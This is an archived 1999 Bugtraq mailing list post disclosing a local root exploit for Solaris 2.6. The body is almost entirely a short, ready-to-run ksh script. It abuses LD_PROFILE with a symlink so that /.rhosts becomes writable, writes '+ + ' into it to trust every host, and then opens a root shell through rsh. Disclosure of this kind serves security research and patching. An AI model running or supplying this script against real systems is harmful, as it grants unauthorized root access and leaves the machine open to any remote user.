[11975] in bugtraq
LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Steve Mynott)
Thu Sep 23 18:21:49 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990922211439.A654@tightrope.demon.co.uk>
Date: Wed, 22 Sep 1999 21:14:40 +0000
Reply-To: Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
From: Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
X-To: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
works on solaris 2.6 sparc anyway...
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# steve@tightrope.demon.co.uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
--
1024/D9C69DF9 steve mynott steve@tightrope.demon.co.uk http://www.pineal.com/
those who do not understand unix are condemned to reinvent it, poorly.
-- henry spencer
